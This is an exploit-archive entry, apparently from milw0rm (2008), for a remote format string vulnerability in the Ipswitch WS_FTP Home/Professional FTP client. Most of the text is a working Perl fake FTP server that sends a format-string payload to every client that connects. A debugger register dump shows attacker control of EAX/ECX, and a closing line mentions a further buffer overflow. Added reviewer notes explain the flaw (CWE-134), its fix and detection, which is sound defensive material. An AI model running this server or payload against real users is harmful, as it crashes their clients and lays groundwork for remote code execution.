WS_FTP HomeProfessional FTP Client Remote Format String PoC by h3m4n


##################################################################################################################
#
# Ipswitch WS_FTP Home/WS_FTP Professional FTP Client Remote Format String vulnerability
# Vendor : http://www.ipswitch.com/
# Affected Os : Windows *
# Risk : critical
#
# This bug is pretty interesting in the way you have to exploit it in a weird way...
#
# With this PoC you'll get a full control over EAX/ECX
# (
# eax=41414141 ebx=0000000a ecx=41414141 edx=00000000 esi=41414142 edi=02b1f0ab
# eip=77d3ef68 esp=02b1f01c ebp=02b1f064 iopl=0         nv up ei pl nz na po nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000                  efl=00010206
# USER32!CharLowerA+0x93:
# 77d3ef68 8a10             mov     dl,[eax]                ds:0023:41414141=??
# )
#
# Reviewer notes (defensive reading of the PoC):
#   * Trigger: the client appears to hand text received from the FTP server to a
#     printf-family routine as the *format* argument. The "%x" conversions consume
#     stack words and "%s" reads through the next word as a pointer; the 0x41 filler
#     at the front of the payload matches the 41414141 seen in EAX/ECX in the dump
#     above, i.e. the server side decides which address gets dereferenced.
#   * Fix class (CWE-134, uncontrolled format string): received text must only ever
#     be a data argument, never the format (printf("%s", msg), not printf(msg)), and
#     compiler format-string diagnostics should be enabled so such call sites fail
#     review/build.
#   * Detection: an FTP greeting or response consisting of runs of printf-style
#     conversion specifiers is not legitimate protocol text and is easy to flag in
#     traffic inspection or client-side logging.
#   * Scope: the server below only provokes the crash shown above; nothing on this
#     page demonstrates code execution.
#
# Fake Server PoC :
use strict;
use Socket;

# Listening port from the first CLI argument; defaults to 21 (FTP control port).
my $port = shift || 21;
my $proto = getprotobyname(’tcp’);
# Payload sent to every connecting client: eight 0x41 filler bytes followed by
# printf-style conversion specifiers. It has no effect on a client that treats
# server text as data; it only matters because of the format-string bug above.
my $goodz = "\x41\x41\x41\x41\x41\x41\x41\x41%x%x%x%x%x%x%x%s";

my $visitor;
# Bareword handle SOCKET (old style); die text is the author's original.
socket(SOCKET, PF_INET, SOCK_STREAM, $proto)
or die "To bad $!\n";
# Lets the port be re-bound right after a previous run; return value not checked.
setsockopt(SOCKET, SOL_SOCKET, SO_REUSEADDR, 1);
# sockaddr_in packed by hand: native-order family, big-endian port, four zero
# address bytes, eight bytes of padding. The all-zero address means the fake
# server accepts connections on every local interface. Socket's pack_sockaddr_in()
# is the portable way to build this structure.
bind(SOCKET, pack( "S n a4 x8", AF_INET, $port, "\0\0\0\0" ))
or die "Shitz port $port is allready in use, shut down your ftp server !\n";
listen(SOCKET, 5) or die "Listen: $!";
print "Fake Server started on port $port\n";
# Serve forever: accept, write the payload, close. Nothing is read from the client,
# so the payload effectively stands in for the server greeting rather than taking
# part in a real FTP exchange. Write errors on NEW_SOCKET are ignored.
while ($visitor = accept(NEW_SOCKET, SOCKET)) {
print NEW_SOCKET $goodz;
close NEW_SOCKET;
}

# Anyways, in the WS_FTP Home client there's still a buffer overflow in the FTP server message response ( 4100 chars answer --> done ).

# milw0rm.com [2008-08-17]





								
To top